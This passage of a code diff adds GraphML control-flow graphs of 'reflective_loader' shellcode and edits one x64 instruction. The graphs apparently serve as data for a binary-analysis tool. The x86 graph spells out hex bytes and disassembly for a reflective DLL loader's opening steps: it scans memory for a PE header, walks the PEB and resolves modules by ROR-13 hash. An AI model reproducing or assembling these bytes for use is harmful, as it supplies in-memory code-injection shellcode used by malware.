+    <edge source="block.0x11f6" target="block.0x11f8"/>
+    <edge source="block.0x11f8" target="block.0x1224"/>
+    <edge source="block.0x1224" target="block.0x122a"/>
+    <edge source="block.0x122a" target="block.0x1231"/>
+    <edge source="block.0x1231" target="block.0x1237"/>
+    <edge source="block.0x1237" target="block.0x123e"/>
+    <edge source="block.0x123e" target="block.0x1254"/>
+    <edge source="block.0x1254" target="block.0x1263"/>
+    <edge source="block.0x1263" target="block.0x126c"/>
+    <edge source="block.0x126c" target="block.0x1275"/>
+    <edge source="block.0x1275" target="block.0x127e"/>
+    <edge source="block.0x127e" target="block.0x128a"/>
+    <edge source="block.0x128a" target="block.0x1293"/>
+    <edge source="block.0x1293" target="block.0x129f"/>
+    <edge source="block.0x129f" target="block.0x12f1"/>
+    <edge source="block.0x12f1" target="block.0x130b"/>
+    <edge source="block.0x130b" target="block.0x130d"/>
+    <edge source="block.0x130d" target="block.0x131e"/>
+    <edge source="block.0x131e" target="block.0x1323"/>
+    <edge source="block.0x1323" target="block.0x133d"/>
+    <edge source="block.0x133d" target="block.0x133f"/>
+    <edge source="block.0x133f" target="block.0x1348"/>
+    <edge source="block.0x1348" target="block.0x1358"/>
+    <edge source="block.0x1358" target="block.0x135f"/>
+    <edge source="block.0x135f" target="block.0x136b"/>
+    <edge source="block.0x136b" target="block.0x1379"/>
+    <edge source="block.0x1379" target="block.0x1387"/>
+    <edge source="block.0x1387" target="block.0x138b"/>
+    <edge source="block.0x138b" target="block.0x139d"/>
+    <edge source="block.0x139d" target="block.0x13a5"/>
+    <edge source="block.0x13a5" target="block.0x13b4"/>
+    <edge source="block.0x13b4" target="block.0x13cc"/>
+    <edge source="block.0x13cc" target="block.0x13d5"/>
+    <edge source="block.0x13d5" target="block.0x13e3"/>
+    <edge source="block.0x13e3" target="block.0x13ea"/>
+    <edge source="block.0x13ea" target="block.0x13f4"/>
+    <edge source="block.0x13f4" target="block.0x13fd"/>
+    <edge source="block.0x13fd" target="block.0x1419"/>
+    <edge source="block.0x1419" target="block.0x1425"/>
+    <edge source="block.0x1425" target="block.0x142c"/>
+    <edge source="block.0x142c" target="block.0x1434"/>
+    <edge source="block.0x1434" target="block.0x144a"/>
+    <edge source="block.0x144a" target="block.0x144f"/>
+    <edge source="block.0x144f" target="block.0x1463"/>
+    <edge source="block.0x1463" target="block.0x1468"/>
+    <edge source="block.0x1468" target="block.0x146a"/>
+    <edge source="block.0x146a" target="block.0x1475"/>
+    <edge source="block.0x1475" target="block.0x147f"/>
+    <edge source="block.0x147f" target="block.0x1488"/>
+    <edge source="block.0x1488" target="block.0x1491"/>
+    <edge source="block.0x1491" target="block.0x14ad"/>
+    <edge source="block.0x14ad" target="block.0x14b2"/>
+    <edge source="block.0x14b2" target="block.0x14ba"/>
+    <edge source="block.0x14ba" target="block.0x14c9"/>
+    <edge source="block.0x14c9" target="block.0x151d"/>
+    <edge source="block.0x151d" target="block.0x1521"/>
+    <edge source="block.0x1521" target="block.0x152a"/>
+    <edge source="block.0x152a" target="block.0x1555"/>
+    <edge source="block.0x1555" target="block.0x156c"/>
+    <edge source="block.0x156c" target="block.0x1583"/>
+    <edge source="block.0x1583" target="block.0x1591"/>
+    <edge source="block.0x1591" target="block.0x15c9"/>
+    <edge source="block.0x15c9" target="block.0x15ce"/>
+    <edge source="block.0x15ce" target="block.0x15d5"/>
+    <edge source="block.0x15d5" target="block.0x15df"/>
+    <edge source="block.0x15df" target="block.0x15e0"/>
+    <edge source="block.0x15e0" target="block.0x15e5"/>
   </graph>
 </graphml>

--- a/data/shellcode/reflective_loader.x64.graphml
+++ b/data/shellcode/reflective_loader.x64.graphml
@@ -322,8 +322,8 @@
         <node id="block.0x106e:instruction.0x106e">
           <data key="address">0x106e</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">4881e900100000</data>
-          <data key="instruction.source">sub rcx, 0x1000</data>
+          <data key="instruction.hex">4883e901</data>
+          <data key="instruction.source">sub rcx, 0x1</data>
         </node>
         <node id="block.0x106e:instruction.0x1075">
           <data key="address">0x1075</data>

--- a/data/shellcode/reflective_loader.x86.graphml
+++ b/data/shellcode/reflective_loader.x86.graphml
@@ -1,0 +1,3620 @@
+<?xml version="1.0" ?>
+<graphml xmlns="http://graphml.graphdrawing.org/xmlns" xmlns:xsi="http://graphml.graphdrawing.org/xmlns" xsi:schemaLocation="http://graphml.graphdrawing.org/xmlns http://graphml.graphdrawing.org/xmlns/1.0/graphml.xsd">
+  <key id="address" for="all" attr.name="address" attr.type="long"/>
+  <key id="type" for="all" attr.name="type" attr.type="string"/>
+  <key id="instruction.source" for="node" attr.name="instruction.source" attr.type="string"/>
+  <key id="instruction.hex" for="node" attr.name="instruction.hex" attr.type="string"/>
+  <key id="data.hex" for="node" attr.name="data.hex" attr.type="string"/>
+  <graph edgedefault="directed">
+    <node id="block.0x1000">
+      <data key="address">0x1000</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1000</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1000:instruction.0x1000">
+          <data key="address">0x1000</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">55</data>
+          <data key="instruction.source">push ebp</data>
+        </node>
+        <node id="block.0x1000:instruction.0x1001">
+          <data key="address">0x1001</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">89e5</data>
+          <data key="instruction.source">mov ebp, esp</data>
+        </node>
+        <node id="block.0x1000:instruction.0x1003">
+          <data key="address">0x1003</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">83ec50</data>
+          <data key="instruction.source">sub esp, 0x50</data>
+        </node>
+        <node id="block.0x1000:instruction.0x1006">
+          <data key="address">0x1006</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">53</data>
+          <data key="instruction.source">push ebx</data>
+        </node>
+        <node id="block.0x1000:instruction.0x1007">
+          <data key="address">0x1007</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">56</data>
+          <data key="instruction.source">push esi</data>
+        </node>
+        <node id="block.0x1000:instruction.0x1008">
+          <data key="address">0x1008</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">57</data>
+          <data key="instruction.source">push edi</data>
+        </node>
+        <node id="block.0x1000:instruction.0x1009">
+          <data key="address">0x1009</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">31c0</data>
+          <data key="instruction.source">xor eax, eax</data>
+        </node>
+        <node id="block.0x1000:instruction.0x100b">
+          <data key="address">0x100b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8945fc</data>
+          <data key="instruction.source">mov dword ptr [ebp - 4], eax</data>
+        </node>
+        <node id="block.0x1000:instruction.0x100e">
+          <data key="address">0x100e</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8945f8</data>
+          <data key="instruction.source">mov dword ptr [ebp - 8], eax</data>
+        </node>
+        <node id="block.0x1000:instruction.0x1011">
+          <data key="address">0x1011</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8945f4</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0xc], eax</data>
+        </node>
+        <node id="block.0x1000:instruction.0x1014">
+          <data key="address">0x1014</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8945f0</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0x10], eax</data>
+        </node>
+        <node id="block.0x1000:instruction.0x1017">
+          <data key="address">0x1017</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8945b4</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0x4c], eax</data>
+        </node>
+        <node id="block.0x1000:instruction.0x101a">
+          <data key="address">0x101a</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">31c9</data>
+          <data key="instruction.source">xor ecx, ecx</data>
+        </node>
+        <node id="block.0x1000:instruction.0x101c">
+          <data key="address">0x101c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">85c9</data>
+          <data key="instruction.source">test ecx, ecx</data>
+        </node>
+        <node id="block.0x1000:instruction.0x101e">
+          <data key="address">0x101e</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7533</data>
+          <data key="instruction.source">jne 0x1053</data>
+        </node>
+        <edge source="block.0x1000:instruction.0x1000" target="block.0x1000:instruction.0x1001"/>
+        <edge source="block.0x1000:instruction.0x1000" target="block.0x1000:instruction.0x1003"/>
+        <edge source="block.0x1000:instruction.0x1000" target="block.0x1000:instruction.0x1006"/>
+        <edge source="block.0x1000:instruction.0x1001" target="block.0x1000:instruction.0x1003"/>
+        <edge source="block.0x1000:instruction.0x1001" target="block.0x1000:instruction.0x100b"/>
+        <edge source="block.0x1000:instruction.0x1001" target="block.0x1000:instruction.0x100e"/>
+        <edge source="block.0x1000:instruction.0x1001" target="block.0x1000:instruction.0x1011"/>
+        <edge source="block.0x1000:instruction.0x1001" target="block.0x1000:instruction.0x1014"/>
+        <edge source="block.0x1000:instruction.0x1001" target="block.0x1000:instruction.0x1017"/>
+        <edge source="block.0x1000:instruction.0x1003" target="block.0x1000:instruction.0x1006"/>
+        <edge source="block.0x1000:instruction.0x1003" target="block.0x1000:instruction.0x1009"/>
+        <edge source="block.0x1000:instruction.0x1006" target="block.0x1000:instruction.0x1007"/>
+        <edge source="block.0x1000:instruction.0x1007" target="block.0x1000:instruction.0x1008"/>
+        <edge source="block.0x1000:instruction.0x1008" target="block.0x1000:instruction.0x100b"/>
+        <edge source="block.0x1000:instruction.0x1009" target="block.0x1000:instruction.0x100b"/>
+        <edge source="block.0x1000:instruction.0x1009" target="block.0x1000:instruction.0x100e"/>
+        <edge source="block.0x1000:instruction.0x1009" target="block.0x1000:instruction.0x1011"/>
+        <edge source="block.0x1000:instruction.0x1009" target="block.0x1000:instruction.0x1014"/>
+        <edge source="block.0x1000:instruction.0x1009" target="block.0x1000:instruction.0x1017"/>
+        <edge source="block.0x1000:instruction.0x1009" target="block.0x1000:instruction.0x101a"/>
+        <edge source="block.0x1000:instruction.0x100b" target="block.0x1000:instruction.0x101e"/>
+        <edge source="block.0x1000:instruction.0x100e" target="block.0x1000:instruction.0x101e"/>
+        <edge source="block.0x1000:instruction.0x1011" target="block.0x1000:instruction.0x101e"/>
+        <edge source="block.0x1000:instruction.0x1014" target="block.0x1000:instruction.0x101e"/>
+        <edge source="block.0x1000:instruction.0x1017" target="block.0x1000:instruction.0x101e"/>
+        <edge source="block.0x1000:instruction.0x101a" target="block.0x1000:instruction.0x101c"/>
+        <edge source="block.0x1000:instruction.0x101c" target="block.0x1000:instruction.0x101e"/>
+      </graph>
+    </node>
+    <node id="block.0x1020">
+      <data key="address">0x1020</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1020</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1020:instruction.0x1020">
+          <data key="address">0x1020</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">e800000000</data>
+          <data key="instruction.source">call 0x1025</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x1025">
+      <data key="address">0x1025</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1025</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1025:instruction.0x1025">
+          <data key="address">0x1025</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">59</data>
+          <data key="instruction.source">pop ecx</data>
+        </node>
+        <node id="block.0x1025:instruction.0x1026">
+          <data key="address">0x1026</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">81e100f0ffff</data>
+          <data key="instruction.source">and ecx, 0xfffff000</data>
+        </node>
+        <edge source="block.0x1025:instruction.0x1025" target="block.0x1025:instruction.0x1026"/>
+      </graph>
+    </node>
+    <node id="block.0x102c">
+      <data key="address">0x102c</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x102c</data>
+        <data key="type">instructions</data>
+        <node id="block.0x102c:instruction.0x102c">
+          <data key="address">0x102c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">6681394d5a</data>
+          <data key="instruction.source">cmp word ptr [ecx], 0x5a4d</data>
+        </node>
+        <node id="block.0x102c:instruction.0x1031">
+          <data key="address">0x1031</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7518</data>
+          <data key="instruction.source">jne 0x104b</data>
+        </node>
+        <edge source="block.0x102c:instruction.0x102c" target="block.0x102c:instruction.0x1031"/>
+      </graph>
+    </node>
+    <node id="block.0x1033">
+      <data key="address">0x1033</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1033</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1033:instruction.0x1033">
+          <data key="address">0x1033</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b413c</data>
+          <data key="instruction.source">mov eax, dword ptr [ecx + 0x3c]</data>
+        </node>
+        <node id="block.0x1033:instruction.0x1036">
+          <data key="address">0x1036</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">83f840</data>
+          <data key="instruction.source">cmp eax, 0x40</data>
+        </node>
+        <node id="block.0x1033:instruction.0x1039">
+          <data key="address">0x1039</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7210</data>
+          <data key="instruction.source">jb 0x104b</data>
+        </node>
+        <edge source="block.0x1033:instruction.0x1033" target="block.0x1033:instruction.0x1036"/>
+        <edge source="block.0x1033:instruction.0x1036" target="block.0x1033:instruction.0x1039"/>
+      </graph>
+    </node>
+    <node id="block.0x103b">
+      <data key="address">0x103b</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x103b</data>
+        <data key="type">instructions</data>
+        <node id="block.0x103b:instruction.0x103b">
+          <data key="address">0x103b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">3d00040000</data>
+          <data key="instruction.source">cmp eax, 0x400</data>
+        </node>
+        <node id="block.0x103b:instruction.0x1040">
+          <data key="address">0x1040</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7309</data>
+          <data key="instruction.source">jae 0x104b</data>
+        </node>
+        <edge source="block.0x103b:instruction.0x103b" target="block.0x103b:instruction.0x1040"/>
+      </graph>
+    </node>
+    <node id="block.0x1042">
+      <data key="address">0x1042</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1042</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1042:instruction.0x1042">
+          <data key="address">0x1042</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">813c0150450000</data>
+          <data key="instruction.source">cmp dword ptr [ecx + eax], 0x4550</data>
+        </node>
+        <node id="block.0x1042:instruction.0x1049">
+          <data key="address">0x1049</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7408</data>
+          <data key="instruction.source">je 0x1053</data>
+        </node>
+        <edge source="block.0x1042:instruction.0x1042" target="block.0x1042:instruction.0x1049"/>
+      </graph>
+    </node>
+    <node id="block.0x104b">
+      <data key="address">0x104b</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x104b</data>
+        <data key="type">instructions</data>
+        <node id="block.0x104b:instruction.0x104b">
+          <data key="address">0x104b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">81e900100000</data>
+          <data key="instruction.source">sub ecx, 0x1000</data>
+        </node>
+        <node id="block.0x104b:instruction.0x1051">
+          <data key="address">0x1051</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">ebd9</data>
+          <data key="instruction.source">jmp 0x102c</data>
+        </node>
+        <edge source="block.0x104b:instruction.0x104b" target="block.0x104b:instruction.0x1051"/>
+      </graph>
+    </node>
+    <node id="block.0x1053">
+      <data key="address">0x1053</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1053</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1053:instruction.0x1053">
+          <data key="address">0x1053</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">894dec</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0x14], ecx</data>
+        </node>
+        <node id="block.0x1053:instruction.0x1056">
+          <data key="address">0x1056</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">64a130000000</data>
+          <data key="instruction.source">mov eax, dword ptr fs:[0x30]</data>
+        </node>
+        <node id="block.0x1053:instruction.0x105c">
+          <data key="address">0x105c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b400c</data>
+          <data key="instruction.source">mov eax, dword ptr [eax + 0xc]</data>
+        </node>
+        <node id="block.0x1053:instruction.0x105f">
+          <data key="address">0x105f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b4014</data>
+          <data key="instruction.source">mov eax, dword ptr [eax + 0x14]</data>
+        </node>
+        <edge source="block.0x1053:instruction.0x1053" target="block.0x1053:instruction.0x1056"/>
+        <edge source="block.0x1053:instruction.0x1053" target="block.0x1053:instruction.0x105c"/>
+        <edge source="block.0x1053:instruction.0x1053" target="block.0x1053:instruction.0x105f"/>
+        <edge source="block.0x1053:instruction.0x1056" target="block.0x1053:instruction.0x105c"/>
+        <edge source="block.0x1053:instruction.0x105c" target="block.0x1053:instruction.0x105f"/>
+      </graph>
+    </node>
+    <node id="block.0x1062">
+      <data key="address">0x1062</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1062</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1062:instruction.0x1062">
+          <data key="address">0x1062</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">85c0</data>
+          <data key="instruction.source">test eax, eax</data>
+        </node>
+        <node id="block.0x1062:instruction.0x1064">
+          <data key="address">0x1064</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0f847f010000</data>
+          <data key="instruction.source">je 0x11e9</data>
+        </node>
+        <edge source="block.0x1062:instruction.0x1062" target="block.0x1062:instruction.0x1064"/>
+      </graph>
+    </node>
+    <node id="block.0x106a">
+      <data key="address">0x106a</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x106a</data>
+        <data key="type">instructions</data>
+        <node id="block.0x106a:instruction.0x106a">
+          <data key="address">0x106a</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8945d0</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0x30], eax</data>
+        </node>
+        <node id="block.0x106a:instruction.0x106d">
+          <data key="address">0x106d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0fb74824</data>
+          <data key="instruction.source">movzx ecx, word ptr [eax + 0x24]</data>
+        </node>
+        <node id="block.0x106a:instruction.0x1071">
+          <data key="address">0x1071</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">85c9</data>
+          <data key="instruction.source">test ecx, ecx</data>
+        </node>
+        <node id="block.0x106a:instruction.0x1073">
+          <data key="address">0x1073</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0f8466010000</data>
+          <data key="instruction.source">je 0x11df</data>
+        </node>
+        <edge source="block.0x106a:instruction.0x106a" target="block.0x106a:instruction.0x106d"/>
+        <edge source="block.0x106a:instruction.0x106d" target="block.0x106a:instruction.0x1071"/>
+        <edge source="block.0x106a:instruction.0x1071" target="block.0x106a:instruction.0x1073"/>
+      </graph>
+    </node>
+    <node id="block.0x1079">
+      <data key="address">0x1079</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1079</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1079:instruction.0x1079">
+          <data key="address">0x1079</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b5028</data>
+          <data key="instruction.source">mov edx, dword ptr [eax + 0x28]</data>
+        </node>
+        <node id="block.0x1079:instruction.0x107c">
+          <data key="address">0x107c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">bf00000000</data>
+          <data key="instruction.source">mov edi, 0</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x1081">
+      <data key="address">0x1081</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1081</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1081:instruction.0x1081">
+          <data key="address">0x1081</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">c1cf0d</data>
+          <data key="instruction.source">ror edi, 0xd</data>
+        </node>
+        <node id="block.0x1081:instruction.0x1084">
+          <data key="address">0x1084</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0fb61a</data>
+          <data key="instruction.source">movzx ebx, byte ptr [edx]</data>
+        </node>
+        <node id="block.0x1081:instruction.0x1087">
+          <data key="address">0x1087</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">80fb61</data>
+          <data key="instruction.source">cmp bl, 0x61</data>
+        </node>
+        <node id="block.0x1081:instruction.0x108a">
+          <data key="address">0x108a</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7203</data>
+          <data key="instruction.source">jb 0x108f</data>
+        </node>
+        <edge source="block.0x1081:instruction.0x1081" target="block.0x1081:instruction.0x1087"/>
+        <edge source="block.0x1081:instruction.0x1084" target="block.0x1081:instruction.0x1087"/>
+        <edge source="block.0x1081:instruction.0x1087" target="block.0x1081:instruction.0x108a"/>
+      </graph>
+    </node>
+    <node id="block.0x108c">
+      <data key="address">0x108c</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x108c</data>
+        <data key="type">instructions</data>
+        <node id="block.0x108c:instruction.0x108c">
+          <data key="address">0x108c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">80eb20</data>
+          <data key="instruction.source">sub bl, 0x20</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x108f">
+      <data key="address">0x108f</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x108f</data>
+        <data key="type">instructions</data>
+        <node id="block.0x108f:instruction.0x108f">
+          <data key="address">0x108f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">01df</data>
+          <data key="instruction.source">add edi, ebx</data>
+        </node>
+        <node id="block.0x108f:instruction.0x1091">
+          <data key="address">0x1091</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">42</data>
+          <data key="instruction.source">inc edx</data>
+        </node>
+        <node id="block.0x108f:instruction.0x1092">
+          <data key="address">0x1092</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">49</data>
+          <data key="instruction.source">dec ecx</data>
+        </node>
+        <node id="block.0x108f:instruction.0x1093">
+          <data key="address">0x1093</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">75ec</data>
+          <data key="instruction.source">jne 0x1081</data>
+        </node>
+        <edge source="block.0x108f:instruction.0x108f" target="block.0x108f:instruction.0x1091"/>
+        <edge source="block.0x108f:instruction.0x1091" target="block.0x108f:instruction.0x1092"/>
+        <edge source="block.0x108f:instruction.0x1092" target="block.0x108f:instruction.0x1093"/>
+      </graph>
+    </node>
+    <node id="block.0x1095">
+      <data key="address">0x1095</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1095</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1095:instruction.0x1095">
+          <data key="address">0x1095</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">81ff5bbc4a6a</data>
+          <data key="instruction.source">cmp edi, 0x6a4abc5b</data>
+        </node>
+        <node id="block.0x1095:instruction.0x109b">
+          <data key="address">0x109b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7411</data>
+          <data key="instruction.source">je 0x10ae</data>
+        </node>
+        <edge source="block.0x1095:instruction.0x1095" target="block.0x1095:instruction.0x109b"/>
+      </graph>
+    </node>
+    <node id="block.0x109d">
+      <data key="address">0x109d</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x109d</data>
+        <data key="type">instructions</data>
+        <node id="block.0x109d:instruction.0x109d">
+          <data key="address">0x109d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">81ff5d68fa3c</data>
+          <data key="instruction.source">cmp edi, 0x3cfa685d</data>
+        </node>
+        <node id="block.0x109d:instruction.0x10a3">
+          <data key="address">0x10a3</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0f8489000000</data>
+          <data key="instruction.source">je 0x1132</data>
+        </node>
+        <edge source="block.0x109d:instruction.0x109d" target="block.0x109d:instruction.0x10a3"/>
+      </graph>
+    </node>
+    <node id="block.0x10a9">
+      <data key="address">0x10a9</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x10a9</data>
+        <data key="type">instructions</data>
+        <node id="block.0x10a9:instruction.0x10a9">
+          <data key="address">0x10a9</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">e931010000</data>
+          <data key="instruction.source">jmp 0x11df</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x10ae">
+      <data key="address">0x10ae</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x10ae</data>
+        <data key="type">instructions</data>
+        <node id="block.0x10ae:instruction.0x10ae">
+          <data key="address">0x10ae</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b45d0</data>
+          <data key="instruction.source">mov eax, dword ptr [ebp - 0x30]</data>
+        </node>
+        <node id="block.0x10ae:instruction.0x10b1">
+          <data key="address">0x10b1</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b7010</data>
+          <data key="instruction.source">mov esi, dword ptr [eax + 0x10]</data>
+        </node>
+        <node id="block.0x10ae:instruction.0x10b4">
+          <data key="address">0x10b4</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8975e8</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0x18], esi</data>
+        </node>
+        <node id="block.0x10ae:instruction.0x10b7">
+          <data key="address">0x10b7</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">e862030000</data>
+          <data key="instruction.source">call 0x141e</data>
+        </node>
+        <edge source="block.0x10ae:instruction.0x10ae" target="block.0x10ae:instruction.0x10b1"/>
+        <edge source="block.0x10ae:instruction.0x10ae" target="block.0x10ae:instruction.0x10b7"/>
+        <edge source="block.0x10ae:instruction.0x10b1" target="block.0x10ae:instruction.0x10b4"/>
+        <edge source="block.0x10ae:instruction.0x10b4" target="block.0x10ae:instruction.0x10b7"/>
+      </graph>
+    </node>
+    <node id="block.0x10bc">
+      <data key="address">0x10bc</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x10bc</data>
+        <data key="type">instructions</data>
+        <node id="block.0x10bc:instruction.0x10bc">
+          <data key="address">0x10bc</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">c745bc02000000</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0x44], 2</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x10c3">
+      <data key="address">0x10c3</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x10c3</data>
+        <data key="type">instructions</data>
+        <node id="block.0x10c3:instruction.0x10c3">
+          <data key="address">0x10c3</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b45c8</data>
+          <data key="instruction.source">mov eax, dword ptr [ebp - 0x38]</data>
+        </node>
+        <node id="block.0x10c3:instruction.0x10c6">
+          <data key="address">0x10c6</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">85c0</data>
+          <data key="instruction.source">test eax, eax</data>
+        </node>
+        <node id="block.0x10c3:instruction.0x10c8">
+          <data key="address">0x10c8</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0f84f3000000</data>
+          <data key="instruction.source">je 0x11c1</data>
+        </node>
+        <edge source="block.0x10c3:instruction.0x10c3" target="block.0x10c3:instruction.0x10c6"/>
+        <edge source="block.0x10c3:instruction.0x10c6" target="block.0x10c3:instruction.0x10c8"/>
+      </graph>
+    </node>
+    <node id="block.0x10ce">
+      <data key="address">0x10ce</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x10ce</data>
+        <data key="type">instructions</data>
+        <node id="block.0x10ce:instruction.0x10ce">
+          <data key="address">0x10ce</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">48</data>
+          <data key="instruction.source">dec eax</data>
+        </node>
+        <node id="block.0x10ce:instruction.0x10cf">
+          <data key="address">0x10cf</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8945c8</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0x38], eax</data>
+        </node>
+        <node id="block.0x10ce:instruction.0x10d2">
+          <data key="address">0x10d2</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b4ddc</data>
+          <data key="instruction.source">mov ecx, dword ptr [ebp - 0x24]</data>
+        </node>
+        <node id="block.0x10ce:instruction.0x10d5">
+          <data key="address">0x10d5</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b09</data>
+          <data key="instruction.source">mov ecx, dword ptr [ecx]</data>
+        </node>
+        <node id="block.0x10ce:instruction.0x10d7">
+          <data key="address">0x10d7</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">034de8</data>
+          <data key="instruction.source">add ecx, dword ptr [ebp - 0x18]</data>
+        </node>
+        <node id="block.0x10ce:instruction.0x10da">
+          <data key="address">0x10da</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">e866030000</data>
+          <data key="instruction.source">call 0x1445</data>
+        </node>
+        <edge source="block.0x10ce:instruction.0x10ce" target="block.0x10ce:instruction.0x10cf"/>
+        <edge source="block.0x10ce:instruction.0x10ce" target="block.0x10ce:instruction.0x10d7"/>
